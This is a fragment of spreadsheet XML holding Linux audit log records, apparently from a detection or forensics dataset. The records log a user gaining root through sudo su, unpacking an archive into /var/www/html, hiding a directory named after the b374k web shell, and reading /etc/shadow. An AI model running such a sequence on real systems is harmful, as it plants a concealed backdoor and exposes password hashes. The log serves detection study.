    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5591d8786e60 a1=5591d876d860 a2=5591d8712cb0 a3=8 items=2 ppid=2386 pid=3060 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts3 ses=6 comm="wget" exe="/usr/bin/wget" key="susp_activity"</t>
  </si>
  <si>
    <t>argc=2 a0="wget" a1="https://www.robotstxt.org/robots.txt"</t>
  </si>
  <si>
    <t>proctitle=776765740068747470733A2F2F7777772E726F626F74737478742E6F72672F726F626F74732E747874</t>
  </si>
  <si>
    <t>type=SERVICE_START</t>
  </si>
  <si>
    <t>msg=audit(1584777767.989:1030):</t>
  </si>
  <si>
    <t>pid=1 uid=0 auid=4294967295 ses=4294967295 msg='unit=anacron comm="systemd" exe="/lib/systemd/systemd" hostname=? addr=? terminal=? res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584777767.993:1031):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=56151ad82400 a1=56151ae7ac90 a2=56151ae71f00 a3=4 items=2 ppid=1 pid=3089 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="anacron" exe="/usr/sbin/anacron" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="/usr/sbin/anacron" a1="-dsq"</t>
  </si>
  <si>
    <t>proctitle=2F7573722F7362696E2F616E6163726F6E002D647371</t>
  </si>
  <si>
    <t>type=SERVICE_STOP</t>
  </si>
  <si>
    <t>msg=audit(1584777768.041:1032):</t>
  </si>
  <si>
    <t>msg=audit(1584777815.662:1033):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5591d8702100 a1=5591d8712890 a2=5591d8712cb0 a3=8 items=2 ppid=2386 pid=3199 auid=1000 uid=1000 gid=1000 euid=0 suid=0 fsuid=0 egid=1000 sgid=1000 fsgid=1000 tty=pts3 ses=6 comm="sudo" exe="/usr/bin/sudo" key="priv_esc"</t>
  </si>
  <si>
    <t>argc=3 a0="sudo" a1="unzip" a2="master.zip"</t>
  </si>
  <si>
    <t>proctitle=7375646F00756E7A6970006D61737465722E7A6970</t>
  </si>
  <si>
    <t>msg=audit(1584777815.662:1034):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=257 success=yes exit=3 a0=ffffff9c a1=7f0fc5863df7 a2=0 a3=0 items=1 ppid=2386 pid=3199 auid=1000 uid=0 gid=1000 euid=1 suid=0 fsuid=1 egid=0 sgid=1000 fsgid=0 tty=pts3 ses=6 comm="sudo" exe="/usr/bin/sudo" key="priv_esc"</t>
  </si>
  <si>
    <t>msg=audit(1584777815.666:1035):</t>
  </si>
  <si>
    <t>pid=3199 uid=1000 auid=1000 ses=6 msg='cwd="/var/www/html" cmd=756E7A6970206D61737465722E7A6970 terminal=pts/3 res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584777815.666:1036):</t>
  </si>
  <si>
    <t>pid=3199 uid=0 auid=1000 ses=6 msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/3 res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584777815.666:1037):</t>
  </si>
  <si>
    <t>pid=3199 uid=0 auid=1000 ses=6 msg='op=PAM:session_open acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/3 res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584777815.666:1038):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5619bc7adb78 a1=5619bc7b5fa8 a2=5619bc7a79f0 a3=0 items=2 ppid=3199 pid=3200 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="unzip" exe="/usr/bin/unzip" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="unzip" a1="master.zip"</t>
  </si>
  <si>
    <t>proctitle=756E7A6970006D61737465722E7A6970</t>
  </si>
  <si>
    <t>msg=audit(1584777815.670:1039):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=90 success=yes exit=0 a0=55f162176420 a1=1ed a2=55f1620861d8 a3=fffffff3 items=1 ppid=3199 pid=3200 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="unzip" exe="/usr/bin/unzip" key="perm_mod"</t>
  </si>
  <si>
    <t>msg=audit(1584777815.670:1040):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=91 success=yes exit=0 a0=4 a1=1a4 a2=0 a3=0 items=1 ppid=3199 pid=3200 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="unzip" exe="/usr/bin/unzip" key="perm_mod"</t>
  </si>
  <si>
    <t>msg=audit(1584777815.670:1041):</t>
  </si>
  <si>
    <t>msg=audit(1584777815.670:1042):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=90 success=yes exit=0 a0=55f162176420 a1=1ed a2=55f162086280 a3=ffffffee items=1 ppid=3199 pid=3200 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="unzip" exe="/usr/bin/unzip" key="perm_mod"</t>
  </si>
  <si>
    <t>msg=audit(1584777815.674:1043):</t>
  </si>
  <si>
    <t>msg=audit(1584777815.674:1044):</t>
  </si>
  <si>
    <t>msg=audit(1584777815.674:1045):</t>
  </si>
  <si>
    <t>msg=audit(1584777815.674:1046):</t>
  </si>
  <si>
    <t>msg=audit(1584777815.674:1047):</t>
  </si>
  <si>
    <t>msg=audit(1584777815.678:1048):</t>
  </si>
  <si>
    <t>msg=audit(1584777815.678:1049):</t>
  </si>
  <si>
    <t>msg=audit(1584777815.678:1050):</t>
  </si>
  <si>
    <t>msg=audit(1584777815.678:1051):</t>
  </si>
  <si>
    <t>msg=audit(1584777815.678:1052):</t>
  </si>
  <si>
    <t>msg=audit(1584777815.682:1053):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=90 success=yes exit=0 a0=55f162176420 a1=1ed a2=55f1620864e8 a3=ffffffec items=1 ppid=3199 pid=3200 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="unzip" exe="/usr/bin/unzip" key="perm_mod"</t>
  </si>
  <si>
    <t>msg=audit(1584777815.682:1054):</t>
  </si>
  <si>
    <t>msg=audit(1584777815.682:1055):</t>
  </si>
  <si>
    <t>msg=audit(1584777815.682:1056):</t>
  </si>
  <si>
    <t>msg=audit(1584777815.682:1057):</t>
  </si>
  <si>
    <t>msg=audit(1584777815.682:1058):</t>
  </si>
  <si>
    <t>msg=audit(1584777815.686:1059):</t>
  </si>
  <si>
    <t>msg=audit(1584777815.686:1060):</t>
  </si>
  <si>
    <t>msg=audit(1584777815.686:1061):</t>
  </si>
  <si>
    <t>msg=audit(1584777815.686:1062):</t>
  </si>
  <si>
    <t>msg=audit(1584777815.686:1063):</t>
  </si>
  <si>
    <t>msg=audit(1584777815.686:1064):</t>
  </si>
  <si>
    <t>msg=audit(1584777815.690:1065):</t>
  </si>
  <si>
    <t>msg=audit(1584777815.690:1066):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=90 success=yes exit=0 a0=55f162176420 a1=1ed a2=55f1620867c0 a3=ffffffed items=1 ppid=3199 pid=3200 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="unzip" exe="/usr/bin/unzip" key="perm_mod"</t>
  </si>
  <si>
    <t>msg=audit(1584777815.690:1067):</t>
  </si>
  <si>
    <t>msg=audit(1584777815.690:1068):</t>
  </si>
  <si>
    <t>msg=audit(1584777815.694:1069):</t>
  </si>
  <si>
    <t>msg=audit(1584777815.694:1070):</t>
  </si>
  <si>
    <t>msg=audit(1584777815.694:1071):</t>
  </si>
  <si>
    <t>msg=audit(1584777815.694:1072):</t>
  </si>
  <si>
    <t>msg=audit(1584777815.698:1073):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=90 success=yes exit=0 a0=55f163602bc0 a1=1ed a2=10 a3=0 items=1 ppid=3199 pid=3200 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="unzip" exe="/usr/bin/unzip" key="perm_mod"</t>
  </si>
  <si>
    <t>msg=audit(1584777815.698:1074):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=90 success=yes exit=0 a0=55f163602b50 a1=1ed a2=55f1635ea010 a3=0 items=1 ppid=3199 pid=3200 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="unzip" exe="/usr/bin/unzip" key="perm_mod"</t>
  </si>
  <si>
    <t>msg=audit(1584777815.698:1075):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=90 success=yes exit=0 a0=55f1636027b0 a1=1ed a2=55f1635ea010 a3=0 items=1 ppid=3199 pid=3200 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="unzip" exe="/usr/bin/unzip" key="perm_mod"</t>
  </si>
  <si>
    <t>msg=audit(1584777815.698:1076):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=90 success=yes exit=0 a0=55f1635fe550 a1=1ed a2=55f1635ea010 a3=0 items=1 ppid=3199 pid=3200 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="unzip" exe="/usr/bin/unzip" key="perm_mod"</t>
  </si>
  <si>
    <t>msg=audit(1584777815.698:1077):</t>
  </si>
  <si>
    <t>pid=3199 uid=0 auid=1000 ses=6 msg='op=PAM:session_close acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/3 res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584777815.698:1078):</t>
  </si>
  <si>
    <t>msg=audit(1584777835.698:1079):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5591d88270b0 a1=5591d882f3f0 a2=5591d8712cb0 a3=8 items=2 ppid=2386 pid=3248 auid=1000 uid=1000 gid=1000 euid=0 suid=0 fsuid=0 egid=1000 sgid=1000 fsgid=1000 tty=pts3 ses=6 comm="sudo" exe="/usr/bin/sudo" key="priv_esc"</t>
  </si>
  <si>
    <t>argc=2 a0="sudo" a1="su"</t>
  </si>
  <si>
    <t>proctitle=7375646F007375</t>
  </si>
  <si>
    <t>msg=audit(1584777835.698:1080):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=257 success=yes exit=3 a0=ffffff9c a1=7f5a49e1fdf7 a2=0 a3=0 items=1 ppid=2386 pid=3248 auid=1000 uid=0 gid=1000 euid=1 suid=0 fsuid=1 egid=0 sgid=1000 fsgid=0 tty=pts3 ses=6 comm="sudo" exe="/usr/bin/sudo" key="priv_esc"</t>
  </si>
  <si>
    <t>msg=audit(1584777835.730:1081):</t>
  </si>
  <si>
    <t>pid=3248 uid=1000 auid=1000 ses=6 msg='cwd="/var/www/html" cmd="su" terminal=pts/3 res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584777835.730:1082):</t>
  </si>
  <si>
    <t>pid=3248 uid=0 auid=1000 ses=6 msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/3 res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584777835.730:1083):</t>
  </si>
  <si>
    <t>pid=3248 uid=0 auid=1000 ses=6 msg='op=PAM:session_open acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/3 res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584777835.730:1084):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55f6df2f0b78 a1=55f6df2f1438 a2=55f6df2ea9d0 a3=0 items=2 ppid=3248 pid=3249 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="su" exe="/bin/su" key="priv_esc"</t>
  </si>
  <si>
    <t>argc=1 a0="su"</t>
  </si>
  <si>
    <t>proctitle="su"</t>
  </si>
  <si>
    <t>msg=audit(1584777835.730:1085):</t>
  </si>
  <si>
    <t>pid=3249 uid=0 auid=1000 ses=6 msg='op=PAM:authentication acct="root" exe="/bin/su" hostname=? addr=? terminal=/dev/pts/3 res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584777835.730:1086):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=257 success=yes exit=3 a0=ffffff9c a1=7f0f2e71a2a3 a2=80000 a3=0 items=1 ppid=3248 pid=3249 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="su" exe="/bin/su" key="etcpasswd"</t>
  </si>
  <si>
    <t>msg=audit(1584777835.730:1087):</t>
  </si>
  <si>
    <t>pid=3249 uid=0 auid=1000 ses=6 msg='op=PAM:accounting acct="root" exe="/bin/su" hostname=? addr=? terminal=/dev/pts/3 res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584777835.730:1088):</t>
  </si>
  <si>
    <t>pid=3249 uid=0 auid=1000 ses=6 msg='op=PAM:setcred acct="root" exe="/bin/su" hostname=? addr=? terminal=/dev/pts/3 res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584777835.734:1089):</t>
  </si>
  <si>
    <t>pid=3249 uid=0 auid=1000 ses=6 msg='op=PAM:session_open acct="root" exe="/bin/su" hostname=? addr=? terminal=/dev/pts/3 res=success'</t>
  </si>
  <si>
    <t>type=USER_ROLE_CHANGE</t>
  </si>
  <si>
    <t>msg=audit(1584777835.734:1090):</t>
  </si>
  <si>
    <t>pid=3250 uid=0 auid=1000 ses=6 msg='op=su acct="root" exe="/bin/su" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/3 res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584777835.734:1091):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5566b6d9a710 a1=7ffea72bdfc0 a2=5566b6d91020 a3=7ffea72be050 items=2 ppid=3249 pid=3250 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="bash" exe="/bin/bash" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=1 a0="bash"</t>
  </si>
  <si>
    <t>proctitle="bash"</t>
  </si>
  <si>
    <t>msg=audit(1584777835.738:1092):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5626ce2abd00 a1=5626ce2ab4d0 a2=5626ce2a8830 a3=8 items=2 ppid=3251 pid=3252 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="groups" exe="/usr/bin/groups" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=1 a0="groups"</t>
  </si>
  <si>
    <t>proctitle="groups"</t>
  </si>
  <si>
    <t>msg=audit(1584777835.738:1093):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=92 success=yes exit=0 a0=5626ce2ab760 a1=0 a2=0 a3=5626ce29c010 items=1 ppid=3249 pid=3250 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="bash" exe="/bin/bash" key="perm_mod"</t>
  </si>
  <si>
    <t>msg=audit(1584777835.742:1094):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5626ce2aaf70 a1=5626ce2a9e00 a2=5626ce2a99a0 a3=5626ce29c010 items=3 ppid=3253 pid=3254 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="lesspipe" exe="/bin/dash" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="/bin/sh" a1="/usr/bin/lesspipe"</t>
  </si>
  <si>
    <t>proctitle=2F62696E2F7368002F7573722F62696E2F6C65737370697065</t>
  </si>
  <si>
    <t>msg=audit(1584777835.742:1095):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=556dbe221828 a1=556dbd017c00 a2=556dbe221798 a3=556dbe221010 items=2 ppid=3254 pid=3255 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="basename" exe="/usr/bin/basename" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="basename" a1="/usr/bin/lesspipe"</t>
  </si>
  <si>
    <t>proctitle=626173656E616D65002F7573722F62696E2F6C65737370697065</t>
  </si>
  <si>
    <t>msg=audit(1584777835.742:1096):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=556dbe22ca78 a1=556dbe22c9b0 a2=556dbe22c9e8 a3=556dbe221010 items=2 ppid=3256 pid=3257 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="dirname" exe="/usr/bin/dirname" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="dirname" a1="/usr/bin/lesspipe"</t>
  </si>
  <si>
    <t>proctitle=6469726E616D65002F7573722F62696E2F6C65737370697065</t>
  </si>
  <si>
    <t>msg=audit(1584777835.746:1097):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5626ce2a8fb0 a1=5626ce2a9180 a2=5626ce2a8bf0 a3=5626ce29c010 items=2 ppid=3258 pid=3259 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="dircolors" exe="/usr/bin/dircolors" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="dircolors" a1="-b"</t>
  </si>
  <si>
    <t>proctitle=646972636F6C6F7273002D62</t>
  </si>
  <si>
    <t>msg=audit(1584777835.746:1098):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=92 success=yes exit=0 a0=5626ce2a5b50 a1=0 a2=0 a3=5626ce29c010 items=1 ppid=3249 pid=3250 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="bash" exe="/bin/bash" key="perm_mod"</t>
  </si>
  <si>
    <t>msg=audit(1584777854.827:1099):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5626ce2d67a0 a1=5626ce2ac090 a2=5626ce2afc80 a3=8 items=2 ppid=3250 pid=3298 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="mv" exe="/bin/mv" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=3 a0="mv" a1="b374k-master/" a2=".b374k/"</t>
  </si>
  <si>
    <t>proctitle=6D7600623337346B2D6D61737465722F002E623337346B2F</t>
  </si>
  <si>
    <t>msg=audit(1584777888.215:1100):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5626ce2b0190 a1=5626ce2b0210 a2=5626ce2afc80 a3=5626ce29c010 items=2 ppid=3250 pid=3365 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="hostname" exe="/bin/hostname" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=1 a0="hostname"</t>
  </si>
  <si>
    <t>proctitle="hostname"</t>
  </si>
  <si>
    <t>msg=audit(1584777911.351:1101):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5626ce2d7750 a1=5626ce2d77d0 a2=5626ce2afc80 a3=5626ce29c010 items=2 ppid=3250 pid=3413 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="cat" exe="/bin/cat" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="cat" a1="/etc/shadow"</t>
  </si>
  <si>
    <t>proctitle=636174002F6574632F736861646F77</t>
  </si>
  <si>
    <t>msg=audit(1584777911.351:1102):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=257 success=yes exit=3 a0=ffffff9c a1=7ffe96e5e877 a2=0 a3=0 items=1 ppid=3250 pid=3413 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="cat" exe="/bin/cat" key="etcpasswd"</t>
  </si>
  <si>
    <t>msg=audit(1584777936.360:1103):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=133 success=yes exit=0 a0=560ba1a259c0 a1=1180 a2=0 a3=1 items=2 ppid=1 pid=815 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="systemd-logind" exe="/lib/systemd/systemd-logind" key="specialfiles"</t>
  </si>
  <si>
    <t>msg=audit(1584777941.532:1104):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=133 success=yes exit=0 a0=560ba1a0aaa0 a1=1180 a2=0 a3=1 items=2 ppid=1 pid=815 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="systemd-logind" exe="/lib/systemd/systemd-logind" key="specialfiles"</t>
  </si>
  <si>
    <t>msg=audit(1584777941.548:1105):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=133 success=yes exit=0 a0=560ba1a13f60 a1=1180 a2=0 a3=1 items=2 ppid=1 pid=815 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="systemd-logind" exe="/lib/systemd/systemd-logind" key="specialfiles"</t>
  </si>
  <si>
    <t>msg=audit(1584777959.744:1106):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5626ce2d78b0 a1=5626ce2d7930 a2=5626ce2afc80 a3=5626ce29c010 items=2 ppid=3250 pid=3512 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="python" exe="/usr/bin/python2.7" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="python" a1="--version"</t>
  </si>
  <si>
    <t>proctitle=707974686F6E002D2D76657273696F6E</t>
  </si>
  <si>
    <t>msg=audit(1584777970.632:1107):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=92 success=yes exit=0 a0=5626ce2c7df0 a1=0 a2=0 a3=0 items=1 ppid=3249 pid=3250 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="bash" exe="/bin/bash" key="perm_mod"</t>
  </si>
  <si>
    <t>msg=audit(1584777970.632:1108):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=92 success=yes exit=0 a0=5626ce2c7df0 a1=0 a2=0 a3=5626ce29c010 items=1 ppid=3249 pid=3250 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="bash" exe="/bin/bash" key="perm_mod"</t>
  </si>
  <si>
    <t>msg=audit(1584777970.632:1109):</t>
  </si>
  <si>
    <t>pid=3249 uid=0 auid=1000 ses=6 msg='op=PAM:session_close acct="root" exe="/bin/su" hostname=? addr=? terminal=/dev/pts/3 res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584777970.632:1110):</t>
  </si>
  <si>
    <t>msg=audit(1584777970.632:1111):</t>
  </si>
  <si>
    <t>pid=3248 uid=0 auid=1000 ses=6 msg='op=PAM:session_close acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/3 res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584777970.632:1112):</t>
  </si>
  <si>
    <t>msg=audit(1584778067.033:1113):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5591d87e2010 a1=5591d8828ef0 a2=5591d8712cb0 a3=8 items=2 ppid=2386 pid=3728 auid=1000 uid=1000 gid=1000 euid=0 suid=0 fsuid=0 egid=1000 sgid=1000 fsgid=1000 tty=pts3 ses=6 comm="sudo" exe="/usr/bin/sudo" key="priv_esc"</t>
  </si>
  <si>
    <t>msg=audit(1584778067.033:1114):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=257 success=yes exit=3 a0=ffffff9c a1=7f4eb1df3df7 a2=0 a3=0 items=1 ppid=2386 pid=3728 auid=1000 uid=0 gid=1000 euid=1 suid=0 fsuid=1 egid=0 sgid=1000 fsgid=0 tty=pts3 ses=6 comm="sudo" exe="/usr/bin/sudo" key="priv_esc"</t>
  </si>
  <si>
    <t>msg=audit(1584778067.037:1115):</t>
  </si>
  <si>
    <t>pid=3728 uid=1000 auid=1000 ses=6 msg='cwd="/home/zapdos" cmd="su" terminal=pts/3 res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584778067.037:1116):</t>
  </si>
  <si>
    <t>pid=3728 uid=0 auid=1000 ses=6 msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/3 res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584778067.037:1117):</t>
  </si>
  <si>
    <t>pid=3728 uid=0 auid=1000 ses=6 msg='op=PAM:session_open acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/3 res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584778067.037:1118):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55e0b4ba1b78 a1=55e0b4ba2438 a2=55e0b4b9b9d0 a3=0 items=2 ppid=3728 pid=3729 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="su" exe="/bin/su" key="priv_esc"</t>
  </si>
  <si>
    <t>msg=audit(1584778067.041:1119):</t>
  </si>
  <si>
    <t>pid=3729 uid=0 auid=1000 ses=6 msg='op=PAM:authentication acct="root" exe="/bin/su" hostname=? addr=? terminal=/dev/pts/3 res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584778067.041:1120):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=257 success=yes exit=3 a0=ffffff9c a1=7f3d0bbb52a3 a2=80000 a3=0 items=1 ppid=3728 pid=3729 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="su" exe="/bin/su" key="etcpasswd"</t>
  </si>
  <si>
    <t>msg=audit(1584778067.041:1121):</t>
  </si>
  <si>
    <t>pid=3729 uid=0 auid=1000 ses=6 msg='op=PAM:accounting acct="root" exe="/bin/su" hostname=? addr=? terminal=/dev/pts/3 res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584778067.045:1122):</t>
  </si>
  <si>
    <t>pid=3729 uid=0 auid=1000 ses=6 msg='op=PAM:setcred acct="root" exe="/bin/su" hostname=? addr=? terminal=/dev/pts/3 res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584778067.049:1123):</t>
  </si>
  <si>
    <t>pid=3729 uid=0 auid=1000 ses=6 msg='op=PAM:session_open acct="root" exe="/bin/su" hostname=? addr=? terminal=/dev/pts/3 res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584778067.049:1124):</t>
  </si>
  <si>
    <t>pid=3730 uid=0 auid=1000 ses=6 msg='op=su acct="root" exe="/bin/su" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/3 res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584778067.049:1125):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=56244254e710 a1=7ffe045d83b0 a2=562442545020 a3=7ffe045d8440 items=2 ppid=3729 pid=3730 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="bash" exe="/bin/bash" key="rootcmd"</t>
  </si>
  <si>
    <t>msg=audit(1584778067.053:1126):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=559558442d00 a1=5595584424d0 a2=55955843f830 a3=8 items=2 ppid=3731 pid=3732 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="groups" exe="/usr/bin/groups" key="rootcmd"</t>
  </si>
  <si>
    <t>msg=audit(1584778067.053:1127):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=92 success=yes exit=0 a0=559558442760 a1=0 a2=0 a3=559558433010 items=1 ppid=3729 pid=3730 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="bash" exe="/bin/bash" key="perm_mod"</t>
  </si>
  <si>
    <t>msg=audit(1584778067.053:1128):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=559558441f70 a1=559558440e00 a2=5595584409a0 a3=559558433010 items=3 ppid=3733 pid=3734 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="lesspipe" exe="/bin/dash" key="rootcmd"</t>
  </si>
  <si>
